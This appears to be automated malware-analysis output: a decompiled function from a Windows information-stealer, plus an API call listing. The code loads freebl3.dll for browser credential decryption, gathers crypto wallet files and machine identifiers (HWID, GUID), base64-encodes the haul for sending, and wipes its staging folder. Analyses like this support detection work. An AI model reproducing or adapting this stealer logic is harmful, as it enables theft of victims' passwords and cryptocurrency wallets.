                                                                                					_t325 =  *_t325;
                                                                                				}
                                                                                				E0040AA08(0, _t325, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v548, 1, 0);
                                                                                				_push("\\freebl3.dll");
                                                                                				_push( &_v108);
                                                                                				_t329 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1c;
                                                                                				__eflags =  *((intOrPtr*)(_t329 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t329 + 0x14)) >= 0x10) {
                                                                                					_t329 =  *_t329;
                                                                                				}
                                                                                				E0040AA08(0, _t329, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v100, 1, 0);
                                                                                				_push( *0x449ce0);
                                                                                				_push( &_v948);
                                                                                				_t333 = E0040D337(0, 0x44858c, 1, __eflags);
                                                                                				__eflags = _t333[0x14] - 0x10;
                                                                                				if(_t333[0x14] >= 0x10) {
                                                                                					_t333 =  *_t333;
                                                                                				}
                                                                                				_t624 = CreateDirectoryA;
                                                                                				CreateDirectoryA(_t333, 0);
                                                                                				E00402C34( &_v940, 1, 0);
                                                                                				_push( *0x449d00);
                                                                                				_push( &_v920);
                                                                                				_t337 = E0040D337(0, 0x44858c, CreateDirectoryA, __eflags);
                                                                                				__eflags = _t337[0x14] - 0x10;
                                                                                				if(_t337[0x14] >= 0x10) {
                                                                                					_t337 =  *_t337;
                                                                                				}
                                                                                				CreateDirectoryA(_t337, 0);
                                                                                				E00402C34( &_v912, 1, 0);
                                                                                				_push( *0x449e88);
                                                                                				_push( &_v864);
                                                                                				_t341 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t341[0x14] - 0x10;
                                                                                				if(_t341[0x14] >= 0x10) {
                                                                                					_t341 =  *_t341;
                                                                                				}
                                                                                				CreateDirectoryA(_t341, 0);
                                                                                				E00402C34( &_v856, 1, 0);
                                                                                				_push( *0x449f54);
                                                                                				_push( &_v808);
                                                                                				_t345 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t345[0x14] - 0x10;
                                                                                				if(_t345[0x14] >= 0x10) {
                                                                                					_t345 =  *_t345;
                                                                                				}
                                                                                				CreateDirectoryA(_t345, 0);
                                                                                				E00402C34( &_v800, 1, 0);
                                                                                				_push( *0x449d4c);
                                                                                				_push( &_v752);
                                                                                				_t349 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t349[0x14] - 0x10;
                                                                                				if(_t349[0x14] >= 0x10) {
                                                                                					_t349 =  *_t349;
                                                                                				}
                                                                                				CreateDirectoryA(_t349, 0);
                                                                                				E00402C34( &_v744, 1, 0);
                                                                                				_push( *0x449df0);
                                                                                				_push( &_v696);
                                                                                				_t353 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t353[0x14] - 0x10;
                                                                                				if(_t353[0x14] >= 0x10) {
                                                                                					_t353 =  *_t353;
                                                                                				}
                                                                                				CreateDirectoryA(_t353, 0);
                                                                                				E00402C34( &_v688, 1, 0);
                                                                                				_push( *0x449f00);
                                                                                				_push( &_v640);
                                                                                				_t357 = E0040D337(0, 0x44858c, _t624, __eflags);
                                                                                				__eflags = _t357[0x14] - 0x10;
                                                                                				if(_t357[0x14] >= 0x10) {
                                                                                					_t357 =  *_t357;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t357);
                                                                                				E00402C34( &_v632, 1, 0);
                                                                                				E0040410F( &_v1160, 0x44858c);
                                                                                				_v1072 = 0xf;
                                                                                				_v1076 = 0;
                                                                                				_v1092 = 0;
                                                                                				_v40 = 0x1e;
                                                                                				_t361 =  *0x44a330; // 0x0
                                                                                				_v1099 = _t361;
                                                                                				_t362 =  *0x44a331; // 0x0
                                                                                				_v1098 = _t362;
                                                                                				_t363 =  *0x44a333; // 0x0
                                                                                				_v1097 = _t363;
                                                                                				_t364 =  *0x44a334; // 0x0
                                                                                				_v1096 = _t364;
                                                                                				_t365 =  *0x44a335; // 0x0
                                                                                				_v1095 = _t365;
                                                                                				_v1100 = 1;
                                                                                				E00403C13( &_v1092,  &_v1160, 0, 0xffffffff);
                                                                                				E00402C34( &_v1160, 1, 0);
                                                                                				_v60 = 0x1f;
                                                                                				E00413F3C(_t579,  &_v1120, __eflags, _v1244, _v1240);
                                                                                				_t627 =  &_v616;
                                                                                				_t370 = E0040410F( &_v616, 0x44858c);
                                                                                				__eflags = _t370[0x14] - 0x10;
                                                                                				if(_t370[0x14] >= 0x10) {
                                                                                					_t370 =  *_t370;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t370);
                                                                                				E00402C34( &_v576, 1, 0);
                                                                                				E004036F6();
                                                                                				_push(_v1208);
                                                                                				E0040ABD6(0,  &_v576, _t579, 0x44858c, _t627, __eflags, _t667);
                                                                                				_t605 = 0x44858c;
                                                                                				__eflags =  *0x44a337; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					_push( *0x449ebc);
                                                                                					_push( &_v520);
                                                                                					_t440 = E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					__eflags = _t440[0x14] - 0x10;
                                                                                					if(_t440[0x14] >= 0x10) {
                                                                                						_t440 =  *_t440;
                                                                                					}
                                                                                					CreateDirectoryA(_t440, 0);
                                                                                					E00402C34( &_v520, 1, 0);
                                                                                					_push( *0x449ebc);
                                                                                					_push( &_v472);
                                                                                					_t444 = E0040D337(0, _t605, _t627, __eflags);
                                                                                					__eflags = _t444[0x14] - 0x10;
                                                                                					if(_t444[0x14] >= 0x10) {
                                                                                						_t444 =  *_t444;
                                                                                					}
                                                                                					SetCurrentDirectoryA(_t444);
                                                                                					E00402C34( &_v464, 1, 0);
                                                                                					__eflags =  *0x448568 - 0x10;
                                                                                					_t447 =  *0x448554; // 0x0
                                                                                					if(__eflags < 0) {
                                                                                						_t447 = 0x448554;
                                                                                					}
                                                                                					E00409D7B(_t579, __eflags, _t447);
                                                                                				}
                                                                                				_push("\\files");
                                                                                				_push( &_v408);
                                                                                				_t376 = E0040D337(0, _t605, _t627, __eflags);
                                                                                				__eflags = _t376[0x14] - 0x10;
                                                                                				if(_t376[0x14] >= 0x10) {
                                                                                					_t376 =  *_t376;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t376);
                                                                                				E00402C34( &_v408, 1, 0);
                                                                                				__eflags =  *0x44a332; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					_t651 = _t648 - 0x1c;
                                                                                					_v1212 = _t651;
                                                                                					_push("\\files\\Wallets");
                                                                                					_push(_t651);
                                                                                					_t605 = 0x44858c;
                                                                                					E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					E0040DBBA(0,  &_v1000, 0x44858c, _t627, __eflags);
                                                                                					_push("\\files\\");
                                                                                					_push( &_v380);
                                                                                					_t434 = E0040D337(0, 0x44858c, _t627, __eflags);
                                                                                					_t652 = _t651 - 0x14;
                                                                                					_t627 = _t434;
                                                                                					_v56 = 0x20;
                                                                                					_v1240 = _t652;
                                                                                					E0040C626(_t652);
                                                                                					E00408FB7(0, 0x44858c, _t434, __eflags);
                                                                                					_t648 = _t652 + 0x1c;
                                                                                					_t171 =  &_v380; // 0x3a0
                                                                                					_v56 = 0x1f;
                                                                                					E00402C34(_t171, 1, 0);
                                                                                				}
                                                                                				__eflags =  *0x44a336; // 0x0
                                                                                				if(__eflags != 0) {
                                                                                					E00417D56();
                                                                                				}
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t379 =  *0x44858c; // 0x0
                                                                                				if( *0x4485a0 < 0x10) {
                                                                                					_t379 = _t605;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t379);
                                                                                				_push(0xf423f);
                                                                                				_push(0);
                                                                                				_t649 = _t648 - 0x1c;
                                                                                				_t550 = _t649;
                                                                                				_v1212 = _t649;
                                                                                				 *((intOrPtr*)(_t550 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t550 + 0x10)) = 0;
                                                                                				 *_t550 = 0;
                                                                                				E0040381A(_t550, "*.*");
                                                                                				_push("\\files");
                                                                                				_push( &_v244);
                                                                                				_v32 = 0x21;
                                                                                				_t383 = E0040D337(0, _t605, _t627, __eflags);
                                                                                				_t553 =  &_v300;
                                                                                				_v32 = 0x22;
                                                                                				_t384 = E004175C4(_t383,  &_v300);
                                                                                				_v36 = 0x23;
                                                                                				__eflags =  *((intOrPtr*)(_t384 + 0x14)) - 8;
                                                                                				if(__eflags >= 0) {
                                                                                					_t384 =  *_t384;
                                                                                				}
                                                                                				_push(0x441100);
                                                                                				_push(_t384);
                                                                                				_push(_v1200);
                                                                                				_v28 = 0x25;
                                                                                				E00408117(0, _t553, _t579, _t605, _t627, __eflags);
                                                                                				_t650 = _t649 + 0x30;
                                                                                				_t606 = 0;
                                                                                				E00403960(0,  &_v296, 1);
                                                                                				_v32 = 0x1f;
                                                                                				E00402C34( &_v244, 1, 0);
                                                                                				__eflags = _v1212;
                                                                                				if(_v1212 != 0) {
                                                                                					_t388 = _v1200;
                                                                                					__eflags =  *_t388 - 2;
                                                                                					if( *_t388 == 2) {
                                                                                						_t629 =  *((intOrPtr*)(_t388 + 4));
                                                                                						__eflags =  *(_t629 + 0x2c);
                                                                                						if( *(_t629 + 0x2c) == 0) {
                                                                                							E0041D1A8(_t629, 0,  &_v244);
                                                                                						}
                                                                                						_t606 =  *(_t629 + 0x20);
                                                                                						_v1216 =  *((intOrPtr*)(_t629 + 0x18));
                                                                                						asm("sbb eax, eax");
                                                                                						_t393 = ( ~_t606 & 0xfffe0000) + 0x20000;
                                                                                						__eflags = _t393;
                                                                                						 *(_t629 + 0x2c) = 1;
                                                                                						 *0x44a438 = _t393;
                                                                                					} else {
                                                                                						_t606 = _v1188;
                                                                                						 *0x44a438 = 0x80000;
                                                                                					}
                                                                                				} else {
                                                                                					_v1216 = 0;
                                                                                					 *0x44a438 = 0x10000;
                                                                                				}
                                                                                				_v1204 = 0;
                                                                                				_v1212 = 0;
                                                                                				__eflags = _t606;
                                                                                				if(_t606 == 0) {
                                                                                					L91:
                                                                                					_v1196 = _v1212;
                                                                                					_v1192 = _v1204;
                                                                                					_t630 = E0040AAB2;
                                                                                					CreateThread(0, 0, E0040AAB2,  &_v1196, 0, 0);
                                                                                					_v1220 = 0;
                                                                                					__eflags =  *0x44a33c; // 0x0
                                                                                					if(__eflags != 0) {
                                                                                						L103:
                                                                                						_t398 = CloseHandle(_v1192);
                                                                                						_t607 = _v1204;
                                                                                						__eflags = _t607;
                                                                                						if(_t607 == 0) {
                                                                                							L106:
                                                                                							E0041D357(_t607);
                                                                                							L107:
                                                                                							SetCurrentDirectoryA("C:\\ProgramData");
                                                                                							__eflags =  *0x4485a0 - 0x10;
                                                                                							_t401 =  *0x44858c; // 0x0
                                                                                							if(__eflags < 0) {
                                                                                								_t401 = 0x44858c;
                                                                                							}
                                                                                							_v1180 = _t401;
                                                                                							_v1176 = 0x43e028;
                                                                                							_v1162 = 0x43e028;
                                                                                							_v1188 = 0;
                                                                                							_v1184 = 3;
                                                                                							_v1172 = 0x414;
                                                                                							_v1170 = 0;
                                                                                							_v1166 = 0;
                                                                                							SHFileOperation( &_v1188);
                                                                                							E004179DA(0, 0x414, _t579, _t607, _t630, __eflags);
                                                                                							E00402C34( &_v1084, 1, 0);
                                                                                							E00402C34( &_v1128, 1, 0);
                                                                                							E00402C34( &_v1048, 1, 0);
                                                                                							_t409 = E00402C34( &_v1028, 1, 0);
                                                                                							 *[fs:0x0] = _v72;
                                                                                							_pop(_t608);
                                                                                							_pop(_t633);
                                                                                							_pop(_t463);
                                                                                							__eflags = _v80 ^ _t650;
                                                                                							return E0041DEB4(_t409, _t463, _v80 ^ _t650, _t579, _t608, _t633);
                                                                                						}
                                                                                						 *_t607 - 1 = _t398 & 0xffffff00 |  *_t607 == 0x00000001;
                                                                                						if((_t398 & 0xffffff00 |  *_t607 == 0x00000001) == 0) {
                                                                                							goto L106;
                                                                                						}
                                                                                						E00407C94(_t630, _t607);
                                                                                						goto L107;
                                                                                					}
                                                                                					_t609 = 0x3c;
                                                                                					do {
                                                                                						_t565 = _v1220;
                                                                                						__eflags = _t565 - 0x12c;
                                                                                						if(__eflags > 0) {
                                                                                							_t415 = _t565 - 0x168;
                                                                                							__eflags = _t415;
                                                                                							L98:
                                                                                							if(__eflags == 0) {
                                                                                								L101:
                                                                                								CreateThread(0, 0, _t630,  &_v1200, 0, 0);
                                                                                								goto L102;
                                                                                							}
                                                                                							_t418 = _t415 - _t609;
                                                                                							__eflags = _t418;
                                                                                							if(_t418 == 0) {
                                                                                								goto L101;
                                                                                							}
                                                                                							__eflags = _t418 != _t609;
                                                                                							if(_t418 != _t609) {
                                                                                								goto L102;
                                                                                							}
                                                                                							goto L101;
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							goto L101;
                                                                                						}
                                                                                						_t421 = _t565 - _t609;
                                                                                						__eflags = _t421;
                                                                                						if(__eflags == 0) {
                                                                                							goto L101;
                                                                                						}
                                                                                						_t415 = _t421 - _t609;
                                                                                						goto L98;
                                                                                						L102:
                                                                                						Sleep(0x3e8);
                                                                                						_v1224 = _v1224 + 1;
                                                                                						__eflags =  *0x44a33c; // 0x0
                                                                                					} while (__eflags == 0);
                                                                                					goto L103;
                                                                                				} else {
                                                                                					_t423 = CryptBinaryToStringA(_t606, _v1216, 0x40000001, 0,  &_v1204);
                                                                                					__eflags = _t423;
                                                                                					if(_t423 == 0) {
                                                                                						goto L91;
                                                                                					}
                                                                                					_t425 = HeapAlloc(GetProcessHeap(), 0, _v1220);
                                                                                					_v1228 = _t425;
                                                                                					__eflags = _t425;
                                                                                					if(_t425 == 0) {
                                                                                						goto L91;
                                                                                					}
                                                                                					_t579 = _v1220;
                                                                                					_t566 = _t425;
                                                                                					__eflags = _t579;
                                                                                					if(_t579 == 0) {
                                                                                						L90:
                                                                                						CryptBinaryToStringA(_t606, _v1232, 0x40000001, _t425,  &_v1220);
                                                                                						goto L91;
                                                                                					} else {
                                                                                						goto L89;
                                                                                					}
                                                                                					do {
                                                                                						L89:
                                                                                						 *_t566 = 0;
                                                                                						_t566 =  &(_t566[1]);
                                                                                						_t579 = _t579 - 1;
                                                                                						__eflags = _t579;
                                                                                					} while (_t579 != 0);
                                                                                					goto L90;
                                                                                				}
                                                                                			}
                                                                                0x0040b8f9
                                                                                0x0040b900
                                                                                0x0040b905
                                                                                0x0040b907
                                                                                0x0040b907
                                                                                0x0040b90d
                                                                                0x0040b91a
                                                                                0x0040b91f
                                                                                0x0040b925
                                                                                0x0040b92a
                                                                                0x0040b930
                                                                                0x0040b932
                                                                                0x0040b932
                                                                                0x0040b936
                                                                                0x0040b946
                                                                                0x0040b952
                                                                                0x0040b958
                                                                                0x0040b966
                                                                                0x0040b96e
                                                                                0x0040b973
                                                                                0x0040b976
                                                                                0x0040b97e
                                                                                0x0040b982
                                                                                0x0040b984
                                                                                0x0040b984
                                                                                0x0040b986
                                                                                0x0040b98d
                                                                                0x0040b993
                                                                                0x0040b995
                                                                                0x0040b995
                                                                                0x0040b99a
                                                                                0x0040b99b
                                                                                0x0040b9a0
                                                                                0x0040b9a5
                                                                                0x0040b9aa
                                                                                0x0040b9af
                                                                                0x0040b9c1
                                                                                0x0040b9d0
                                                                                0x0040b9d8
                                                                                0x0040b9e7
                                                                                0x0040b9f2
                                                                                0x0040b9f9
                                                                                0x0040b9fd
                                                                                0x0040ba09
                                                                                0x0040ba0e
                                                                                0x0040ba14
                                                                                0x0040ba1c
                                                                                0x0040ba2b
                                                                                0x0040ba33
                                                                                0x0040ba3f
                                                                                0x0040ba40
                                                                                0x0040ba57
                                                                                0x0040ba6d
                                                                                0x0040ba75
                                                                                0x0040ba7a
                                                                                0x0040ba7d
                                                                                0x0040ba85
                                                                                0x0040ba89
                                                                                0x0040ba8b
                                                                                0x0040ba8b
                                                                                0x0040ba8f
                                                                                0x0040baa2
                                                                                0x0040baa6
                                                                                0x0040bab4
                                                                                0x0040bac2
                                                                                0x0040bad0
                                                                                0x0040bad8
                                                                                0x0040badd
                                                                                0x0040bae1
                                                                                0x0040baf2
                                                                                0x0040baf7
                                                                                0x0040bafc
                                                                                0x0040baff
                                                                                0x0040bb0a
                                                                                0x0040bb0f
                                                                                0x0040bb17
                                                                                0x0040bb1b
                                                                                0x0040bb22
                                                                                0x0040bb2a
                                                                                0x0040bb2e
                                                                                0x0040bb30
                                                                                0x0040bb30
                                                                                0x0040bb3a
                                                                                0x0040bb49
                                                                                0x0040bb51
                                                                                0x0040bb5d
                                                                                0x0040bb62
                                                                                0x0040bb6a
                                                                                0x0040bb71
                                                                                0x0040bb79
                                                                                0x0040bb7d
                                                                                0x0040bb7f
                                                                                0x0040bb7f
                                                                                0x0040bb89
                                                                                0x0040bb98
                                                                                0x0040bba0
                                                                                0x0040bbac
                                                                                0x0040bbb1
                                                                                0x0040bbb9
                                                                                0x0040bbc0
                                                                                0x0040bbc8
                                                                                0x0040bbcc
                                                                                0x0040bbce
                                                                                0x0040bbce
                                                                                0x0040bbd8
                                                                                0x0040bbe7
                                                                                0x0040bbef
                                                                                0x0040bbfb
                                                                                0x0040bc00
                                                                                0x0040bc08
                                                                                0x0040bc0f
                                                                                0x0040bc17
                                                                                0x0040bc1b
                                                                                0x0040bc1d
                                                                                0x0040bc1d
                                                                                0x0040bc27
                                                                                0x0040bc36
                                                                                0x0040bc3e
                                                                                0x0040bc4a
                                                                                0x0040bc4f
                                                                                0x0040bc57
                                                                                0x0040bc5e
                                                                                0x0040bc66
                                                                                0x0040bc6a
                                                                                0x0040bc6c
                                                                                0x0040bc6c
                                                                                0x0040bc76
                                                                                0x0040bc85
                                                                                0x0040bc8d
                                                                                0x0040bc99
                                                                                0x0040bc9e
                                                                                0x0040bca6
                                                                                0x0040bcad
                                                                                0x0040bcb5
                                                                                0x0040bcb9
                                                                                0x0040bcbb
                                                                                0x0040bcbb
                                                                                0x0040bcc5
                                                                                0x0040bcd4
                                                                                0x0040bcdc
                                                                                0x0040bce1
                                                                                0x0040bcee
                                                                                0x0040bcf4
                                                                                0x0040bcf9
                                                                                0x0040bcff
                                                                                0x0040bd01
                                                                                0x0040bd01
                                                                                0x0040bd03
                                                                                0x0040bd0b
                                                                                0x0040bd17
                                                                                0x0040bd1c
                                                                                0x0040bd29
                                                                                0x0040bd2a
                                                                                0x0040bd2f
                                                                                0x0040bd35
                                                                                0x0040bd37
                                                                                0x0040bd37
                                                                                0x0040bd3b
                                                                                0x0040bd47
                                                                                0x0040bd4c
                                                                                0x0040bd59
                                                                                0x0040bd5a
                                                                                0x0040bd5f
                                                                                0x0040bd65
                                                                                0x0040bd67
                                                                                0x0040bd67
                                                                                0x0040bd6b
                                                                                0x0040bd77
                                                                                0x0040bd7c
                                                                                0x0040bd89
                                                                                0x0040bd8a
                                                                                0x0040bd8f
                                                                                0x0040bd95
                                                                                0x0040bd97
                                                                                0x0040bd97
                                                                                0x0040bd9b
                                                                                0x0040bda7
                                                                                0x0040bdac
                                                                                0x0040bdb9
                                                                                0x0040bdba
                                                                                0x0040bdbf
                                                                                0x0040bdc5
                                                                                0x0040bdc7
                                                                                0x0040bdc7
                                                                                0x0040bdcb
                                                                                0x0040bdd7
                                                                                0x0040bddc
                                                                                0x0040bde9
                                                                                0x0040bdea
                                                                                0x0040bdef
                                                                                0x0040bdf5
                                                                                0x0040bdf7
                                                                                0x0040bdf7
                                                                                0x0040bdfb
                                                                                0x0040be07
                                                                                0x0040be0c
                                                                                0x0040be19
                                                                                0x0040be1a
                                                                                0x0040be1f
                                                                                0x0040be25
                                                                                0x0040be27
                                                                                0x0040be27
                                                                                0x0040be2a
                                                                                0x0040be3a
                                                                                0x0040be49
                                                                                0x0040be4e
                                                                                0x0040be59
                                                                                0x0040be60
                                                                                0x0040be67
                                                                                0x0040be6f
                                                                                0x0040be74
                                                                                0x0040be7b
                                                                                0x0040be80
                                                                                0x0040be87
                                                                                0x0040be8c
                                                                                0x0040be93
                                                                                0x0040be98
                                                                                0x0040be9f
                                                                                0x0040bea6
                                                                                0x0040beb8
                                                                                0x0040bec0
                                                                                0x0040beca
                                                                                0x0040becf
                                                                                0x0040bee6
                                                                                0x0040beec
                                                                                0x0040bef3
                                                                                0x0040bef8
                                                                                0x0040befc
                                                                                0x0040befe
                                                                                0x0040befe
                                                                                0x0040bf01
                                                                                0x0040bf11
                                                                                0x0040bf16
                                                                                0x0040bf1b
                                                                                0x0040bf1f
                                                                                0x0040bf25
                                                                                0x0040bf2a
                                                                                0x0040bf30
                                                                                0x0040bf36
                                                                                0x0040bf43
                                                                                0x0040bf44
                                                                                0x0040bf49
                                                                                0x0040bf4f
                                                                                0x0040bf51
                                                                                0x0040bf51
                                                                                0x0040bf55
                                                                                0x0040bf65
                                                                                0x0040bf6a
                                                                                0x0040bf77
                                                                                0x0040bf78
                                                                                0x0040bf7d
                                                                                0x0040bf83
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf88
                                                                                0x0040bf98
                                                                                0x0040bf9d
                                                                                0x0040bfa4
                                                                                0x0040bfa9
                                                                                0x0040bfab
                                                                                0x0040bfab
                                                                                0x0040bfb1
                                                                                0x0040bfb6
                                                                                0x0040bfbe
                                                                                0x0040bfc3
                                                                                0x0040bfc4
                                                                                0x0040bfc9
                                                                                0x0040bfcf
                                                                                0x0040bfd1
                                                                                0x0040bfd1
                                                                                0x0040bfd4
                                                                                0x0040bfe4
                                                                                0x0040bfe9
                                                                                0x0040bfef
                                                                                0x0040bff1
                                                                                0x0040bff6
                                                                                0x0040bffa
                                                                                0x0040bfff
                                                                                0x0040c000
                                                                                0x0040c005
                                                                                0x0040c013
                                                                                0x0040c01f
                                                                                0x0040c024
                                                                                0x0040c025
                                                                                0x0040c02a
                                                                                0x0040c02d
                                                                                0x0040c02f
                                                                                0x0040c039
                                                                                0x0040c03d
                                                                                0x0040c042
                                                                                0x0040c047
                                                                                0x0040c04d
                                                                                0x0040c054
                                                                                0x0040c05c
                                                                                0x0040c05c
                                                                                0x0040c061
                                                                                0x0040c067
                                                                                0x0040c069
                                                                                0x0040c069
                                                                                0x0040c06e
                                                                                0x0040c075
                                                                                0x0040c07a
                                                                                0x0040c07c
                                                                                0x0040c07c
                                                                                0x0040c07f
                                                                                0x0040c085
                                                                                0x0040c08a
                                                                                0x0040c08b

                                                                                APIs
                                                                                  • Part of subcall function 00419473: LoadLibraryA.KERNEL32(?,?,?,?,?,?,4124C941), ref: 00419481
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000), ref: 0041949E
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000), ref: 004194AC
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CreateThread), ref: 004194C7
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004194D8
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004194E9
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 004194FA
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 0041950B
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 0041951C
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0041952D
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,HeapAlloc), ref: 0041953E
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 0041954F
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00419560
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00419571
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00419582
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00419593
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004195A4
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 004195B5
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004195C6
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 004195D7
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,MultiByteToWideChar), ref: 004195E8
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrcatA), ref: 004195F9
                                                                                  • Part of subcall function 00415610: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,4124C941), ref: 0041561E
                                                                                  • Part of subcall function 00415BB2: GetUserNameA.ADVAPI32(?,?), ref: 00415BE0
                                                                                  • Part of subcall function 0041551F: __EH_prolog3.LIBCMT ref: 0041553E
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040B6FA
                                                                                • GetLastError.KERNEL32 ref: 0040B704
                                                                                • Sleep.KERNEL32(00007530), ref: 0040B716
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B770
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B7A7
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B804
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B83B
                                                                                • Sleep.KERNEL32(0001D4C0), ref: 0040B84A
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 0040D47C: __EH_prolog3.LIBCMT ref: 0040D483
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 0040B8F3
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 0040B90D
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040B936
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040BD0B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD3B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD6B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD9B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BDCB
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BDFB
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 0040BE2A
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,0044858C,?,?,00000001,00000000,0044858C,00000001,00000000), ref: 0040BF01
                                                                                  • Part of subcall function 0040ABD6: __EH_prolog3_GS.LIBCMT ref: 0040ABE0
                                                                                  • Part of subcall function 0040ABD6: GetProcessHeap.KERNEL32(00000000,000F423F,00000270,0040BF24,?,00000001,00000000), ref: 0040ABF6
                                                                                  • Part of subcall function 0040ABD6: HeapAlloc.KERNEL32(00000000), ref: 0040ABFD
                                                                                  • Part of subcall function 0040ABD6: __time64.LIBCMT ref: 0040AC12
                                                                                  • Part of subcall function 0040ABD6: __localtime64_s.LIBCMT ref: 0040AC26
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,Version: ), ref: 0040AC46
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040AC61
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00440ED8), ref: 0040AC7E
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,Date: ), ref: 0040AC8A
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,?), ref: 0040AC95
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,MachineID: ), ref: 0040ACA1
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040ACBC
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,GUID: ), ref: 0040ACD7
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040ACF6
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,HWID: ), ref: 0040AD11
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BF55
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 0040BF88
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000001,00000000), ref: 0040BFD4
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000001,00000000), ref: 0040C07F
                                                                                • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,?), ref: 0040C1AA
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1B9
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040C1C0
                                                                                • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,?), ref: 0040C1EA
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040AAB2,?,00000000,00000000), ref: 0040C20F
